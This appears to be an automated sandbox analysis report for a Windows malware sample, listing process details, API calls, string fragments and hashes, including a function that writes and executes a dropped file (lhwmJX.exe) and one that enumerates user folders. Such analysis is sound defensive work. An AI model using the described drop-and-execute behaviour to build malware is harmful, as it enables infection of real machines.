Show Windows behavior

Target ID:	9
Start time:	06:26:01
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 1520
Imagebase:	0xc10000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4%
Total number of Nodes:	2000
Total number of Limit Nodes:	85

Executed Functions

Function 00414044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00414223
WriteFile.KERNELBASE(00000000,FFFEE376,00003E00,?,00000000), ref: 00414252
CloseHandle.KERNELBASE(00000000), ref: 00414256
WinExec.KERNEL32(?,00000005), ref: 00414262

Strings

catA, xrefs: 004141AF
el32, xrefs: 004140FB
athA, xrefs: 00414199
Writ, xrefs: 00414148
GetT, xrefs: 00414188
odul, xrefs: 0041422D
Kern, xrefs: 004140F4
WinE, xrefs: 00414110
lhwmJX.exe, xrefs: 004141FD, 00414200
dleA, xrefs: 004140D0
.dll, xrefs: 00414102
lstr, xrefs: 004141A7
Crea, xrefs: 00414169
Clos, xrefs: 00414129
GetM, xrefs: 004140B6

Memory Dump Source

Source File: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd

Similarity

API ID: File$CloseCreateExecHandleWrite
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lhwmJX.exe$lstr$odul
API String ID: 3741012433-3165335678
Opcode ID: 99656044aced93209d6b99c8531b9466bb2c5cb2e1b473b31b61a1251caa54da
Instruction ID: 13a8660bd61ee636bc4ab6606bb88dd14397b52f92bfab53bc47a8a202071d24
Opcode Fuzzy Hash: 99656044aced93209d6b99c8531b9466bb2c5cb2e1b473b31b61a1251caa54da
Instruction Fuzzy Hash: 1C612978D00215ABCF24CF90D848AEEBBB0BB94315F2582ABD405A7701C3789EC1CB99

Function 004014E0 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 221
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 0040150B
__open.LIBCMT ref: 00401585
_fprintf.LIBCMT ref: 004015A7
__read.LIBCMT ref: 004015D7
__close.LIBCMT ref: 004015E4
_strncmp.LIBCMT ref: 0040161B
_calloc.LIBCMT ref: 004016AC
__execv.LIBCMT ref: 0040173B
_fprintf.LIBCMT ref: 00401752

Strings

Could not exec %s, xrefs: 00401744
-script.py, xrefs: 00401558
Cannot open %s, xrefs: 00401599
Cannot find Python executable %s, xrefs: 0040168A
#!python.exe, xrefs: 00401627

Memory Dump Source

Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd

Similarity

API ID: _fprintf$FileModuleName__close__execv__open__read_calloc_strncmp
String ID: #!python.exe$-script.py$Cannot find Python executable %s$Cannot open %s$Could not exec %s
API String ID: 2502740745-2140616494
Opcode ID: d61dc47c1f6b3fc5c978a5c87932c43162ec3572d0ae017d735f52c74d84159e
Instruction ID: 25c8925ce12de3f480e09760b7f2022446e318c11543bd00bd3da7588873c4e1
Opcode Fuzzy Hash: d61dc47c1f6b3fc5c978a5c87932c43162ec3572d0ae017d735f52c74d84159e
Instruction Fuzzy Hash: 1E8125719043419BD321EF65D841B9B73E8AFD8304F14497EF4C9A73E2E639A9048B9B

Function 004021B8 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 004021C0

Part of subcall function 0040218D: GetModuleHandleW.KERNEL32(mscoree.dll,?,004021C5,?,?,00406A6B,000000FF,0000001E,?,0040396D,?,00000001,?,?,00403E53,00000018), ref: 00402197
Part of subcall function 0040218D: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004021A7

ExitProcess.KERNEL32 ref: 004021C9

Memory Dump Source

Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 3e2e31803638fc65cc788ac61652c8e8c59aff9d5a362736e4cf6afc50ca3ab6
Instruction ID: 4f065410a833747b2fa51117dbabb5f5d23e2195355c7fa658f3e8009557e2db
Opcode Fuzzy Hash: 3e2e31803638fc65cc788ac61652c8e8c59aff9d5a362736e4cf6afc50ca3ab6
Instruction Fuzzy Hash: F4B09B31000158BBDB012F23DD4DC4D7F55DB403917104035F914190B1DFB1AD5299D4

Function 00406448 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040645D

Memory Dump Source

Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 98c8d639fe9f43e90fece2508cdc85c67e97022a4ea6df9a20a3cb5296762ef1
Instruction ID: 0b411b1c4460c74cfc81a185269fba42b9c3ed74cd733ab1816ec4eaf215ceb7
Opcode Fuzzy Hash: 98c8d639fe9f43e90fece2508cdc85c67e97022a4ea6df9a20a3cb5296762ef1
Instruction Fuzzy Hash: C1D05E766943055AEB145F756E087663BDCD784795F008436B80DC6590E5B4C5609908

Function 004023D4 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 004023E0

Part of subcall function 004022A8: __lock.LIBCMT ref: 004022B6
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 004022ED
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 00402302
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 0040232C
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 00402342
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 0040234F
Part of subcall function 004022A8: __initterm.LIBCMT ref: 0040237E
Part of subcall function 004022A8: __initterm.LIBCMT ref: 0040238E

Memory Dump Source

Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: 56d6ec75f9ca001e469de65b509690461a690c23f8048b21a9ddfe31d5bb7ce0
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D5B0927258020833EA202582AC07F063B1987C0B64E240066BA0C295E1A9A6A961808A

Non-executed Functions

Function 00401EE2 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00404424
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404439
UnhandledExceptionFilter.KERNEL32(0040E2D4), ref: 00404444
GetCurrentProcess.KERNEL32(C0000409), ref: 00404460
TerminateProcess.KERNEL32(00000000), ref: 00404467

Memory Dump Source

Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 7978dca4579781c9c5fcb4871f2d337207cca24b5e6b76e3f09e85183cb6994f
Instruction ID: 45eb3ae3ae9be5a42db89100f48cb7a8cce6cf88836da85b8f83d6c6f4e9d677
Opcode Fuzzy Hash: 7978dca4579781c9c5fcb4871f2d337207cca24b5e6b76e3f09e85183cb6994f
Instruction Fuzzy Hash: 8321EFB4401210EFD744DF25FA456893BB4FB08300F1085BAEA08E32B0E3F859A48B1E

Function 00405FD0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00005F8E), ref: 00405FD5

Memory Dump Source

Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5dadea657f4094459ad9e9ed7ed5bd322b2888e839c78983bdf37fdd45e3efba
Instruction ID: b5881ed52c6df8735d000d9ac44c9edf02bf042a1d3980fa659c74c026935dce
Opcode Fuzzy Hash: 5dadea657f4094459ad9e9ed7ed5bd322b2888e839c78983bdf37fdd45e3efba
Instruction Fuzzy Hash: 1D9002613515115AC60027B15E0965B26949A5960675108716A12E4094DABC8054991A

Function 00417B71 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction ID: 7b357e6e517895dbe12adbe9a7f777a7b357507db5a8af5602780b1ce824b875
Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction Fuzzy Hash: 79819531608B458FC714DF29D8906EAB7E2EFD6314F14892ED0EA87751D738A889CB49

Function 004010A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 004010FA
__wsplitpath.LIBCMT ref: 00401133
__wmakepath.LIBCMT ref: 00401186
_calloc.LIBCMT ref: 00401192
_strncpy.LIBCMT ref: 004011A7
_calloc.LIBCMT ref: 004011B8
_strncpy.LIBCMT ref: 004011C6

Strings

\, xrefs: 0040110D
\, xrefs: 0040114B

Memory Dump Source

Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd

Similarity

API ID: __wsplitpath_calloc_strncpy$__wmakepath
String ID: \$\
API String ID: 550690-164819647
Opcode ID: bbff70bb15c8dd2f564c854139eba0895367efbb5d87954141f89174ae00e88c
Instruction ID: 3ab556dc7228b43ace4fc2f08a2dff9a1329299df0561b3fd7c49054973d16d9
Opcode Fuzzy Hash: bbff70bb15c8dd2f564c854139eba0895367efbb5d87954141f89174ae00e88c
Instruction Fuzzy Hash: 46314AB1404380AED325DB10CC81FEBB3E8AF89704F04456EF6C567191E278994887AB

Function 00401350 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60processsynchronizationCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401375
SetConsoleCtrlHandler.KERNEL32 ref: 0040138C
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,?,00000001), ref: 004013AF
_fprintf.LIBCMT ref: 004013C7
WaitForSingleObject.KERNEL32(00000001,000000FF), ref: 004013E6
GetExitCodeProcess.KERNEL32(00000001,00000000), ref: 004013F5

Strings

failed to create process., xrefs: 004013B9
D, xrefs: 00401384
failed to get exit code from process., xrefs: 004013FF

Memory Dump Source

Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd

Similarity

API ID: Process$CodeConsoleCreateCtrlExitHandlerObjectSingleWait_fprintf_memset
String ID: D$failed to create process.$failed to get exit code from process.
API String ID: 1493708761-2047806753
Opcode ID: 554cc121d98ebd15e674268335262f3739016ec637f7076d6ae0b89d70685e2d
Instruction ID: c0b4ef9865efaefbb4655db6787bc9468adefed468afa6ea3df7463377fb4bcc
Opcode Fuzzy Hash: 554cc121d98ebd15e674268335262f3739016ec637f7076d6ae0b89d70685e2d
Instruction Fuzzy Hash: F41191B0648301AFE310EF65CD46F1B77E8AB84B04F108D2DF659E62D0E6B8D5188B5A

Function 00404695 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004046A1

Part of subcall function 0040513E: __getptd_noexit.LIBCMT ref: 00405141
Part of subcall function 0040513E: __amsg_exit.LIBCMT ref: 0040514E

__amsg_exit.LIBCMT ref: 004046C1
__lock.LIBCMT ref: 004046D1
InterlockedDecrement.KERNEL32(?), ref: 004046EE
InterlockedIncrement.KERNEL32(00A21690), ref: 00404719

Memory Dump Source

Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 150209a0db33c1df6409144fcaa29095b5e5db799e09e61fce24405c8d76a00e
Instruction ID: 182624ffc8af25ae610049a1f2154bb3440c6d97a259276cb1923d31de180150
Opcode Fuzzy Hash: 150209a0db33c1df6409144fcaa29095b5e5db799e09e61fce24405c8d76a00e
Instruction Fuzzy Hash: 8F01EDB29026209BC720AF6698057AE7A60BF41716F04813BEA60772E0C73C6942CFDD

Function 00403A8D Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00403AAB

Part of subcall function 00403EC9: __mtinitlocknum.LIBCMT ref: 00403EDF
Part of subcall function 00403EC9: __amsg_exit.LIBCMT ref: 00403EEB
Part of subcall function 00403EC9: EnterCriticalSection.KERNEL32(?,?,?,004019E2,?), ref: 00403EF3

___sbh_find_block.LIBCMT ref: 00403AB6
___sbh_free_block.LIBCMT ref: 00403AC5
HeapFree.KERNEL32(00000000,?,0040F570,0000000C,0040512F,00000000,?,0040396D,?,00000001,?,?,00403E53,00000018,0040F5D8,0000000C), ref: 00403AF5
GetLastError.KERNEL32(?,0040396D,?,00000001,?,?,00403E53,00000018,0040F5D8,0000000C,00403EE4,?,?,?,004019E2,?), ref: 00403B06

Memory Dump Source

Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: a891d932a0e071ca475934fd523367eacad69da5e60af7b176750d227c8f8db1
Instruction ID: c008ab2ad1e45627aee82902e3c9ce951945f4afddf5f4c3619f6cb35890dbb1
Opcode Fuzzy Hash: a891d932a0e071ca475934fd523367eacad69da5e60af7b176750d227c8f8db1
Instruction Fuzzy Hash: 92017CB1A11211AADF30AF729C06B5F7E6CAF4176AF10843FF040B61C2DA7D9A408A5C

Function 00401410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 00401469
_sprintf.LIBCMT ref: 00401477
_sprintf.LIBCMT ref: 004014A9

Strings

%s, xrefs: 004014A3

Memory Dump Source

Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd

Similarity

API ID: _sprintf$_calloc
String ID: %s
API String ID: 1847391153-3874713491
Opcode ID: bd7563a1cb415c53eaa3f3605baf5fb9548cd0f100c108af1577adfff1cba989
Instruction ID: 2acd6506d57c741a920e626a4b5d567ea857566bf975ef263a1adc6b9bcf76df
Opcode Fuzzy Hash: bd7563a1cb415c53eaa3f3605baf5fb9548cd0f100c108af1577adfff1cba989
Instruction Fuzzy Hash: 7A2138312042025FC311CF1CC494AE6B3E69F86348F15416AF885EB2B2DA76E90E87D5

Function 0040A254 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040A288
__isleadbyte_l.LIBCMT ref: 0040A2BC
MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,00000000,?,?,00000000), ref: 0040A2ED
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,00000000,?,?,00000000), ref: 0040A35B

Memory Dump Source

Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 94773e464a501d964cb96ea099f2e7eec610af71810bc110438a39ae59925cc0
Instruction ID: 7f9a93b8890bd1a92f443f0c43a6467d4f975921de71c3944034b7a742ca2f9f
Opcode Fuzzy Hash: 94773e464a501d964cb96ea099f2e7eec610af71810bc110438a39ae59925cc0
Instruction Fuzzy Hash: A5319331900345EFDF20DFA4C8809AE7BA5AF01310B1585BEE861AB3D1D739DE60DB5A

Function 00404E01 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00404E0D

Part of subcall function 0040513E: __getptd_noexit.LIBCMT ref: 00405141
Part of subcall function 0040513E: __amsg_exit.LIBCMT ref: 0040514E

__getptd.LIBCMT ref: 00404E24
__amsg_exit.LIBCMT ref: 00404E32
__lock.LIBCMT ref: 00404E42

Memory Dump Source

Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 2388708164fe7afdc53ff6d0dcdca69360b68789bed62c157f7e008279cbb2a2
Instruction ID: 0510b9d258df4cc48bf533c41f06a4eb4879bd88572707fc40d1bee35bf251e0
Opcode Fuzzy Hash: 2388708164fe7afdc53ff6d0dcdca69360b68789bed62c157f7e008279cbb2a2
Instruction Fuzzy Hash: 20F012B29517008AD720BB75D406B4E77A57F80716F10867FE640BB3D2CB7C59018B99

Analysis Process: lhwmJX.exePID: 6052, Parent PID: 3812COMMON

Execution Graph

Execution Coverage:	28.9%
Dynamic/Decrypted Code Coverage:	10.4%
Signature Coverage:	18.9%
Total number of Nodes:	297
Total number of Limit Nodes:	11

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00BC29E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00BC2A02
wsprintfA.USER32 ref: 00BC2A1A
memset.MSVCRT ref: 00BC2A44
lstrlen.KERNEL32(?), ref: 00BC2A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00BC2A6C
strrchr.MSVCRT ref: 00BC2A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00BC2A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00BC2AAE
memset.MSVCRT ref: 00BC2AC6
memset.MSVCRT ref: 00BC2ADA
FindFirstFileA.KERNEL32(?,?), ref: 00BC2AEF
memset.MSVCRT ref: 00BC2B13
lstrcmpiA.KERNEL32(?,?), ref: 00BC2B42
FindNextFileA.KERNEL32(00000000,?,?,?,?), ref: 00BC2B67
FindClose.KERNEL32(00000000), ref: 00BC2B6E

Strings

Documents and Settings, xrefs: 00BC2A8D, 00BC2A92, 00BC2A9A, 00BC2AAD
C:\, xrefs: 00BC2A2F
%s*, xrefs: 00BC2A14

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
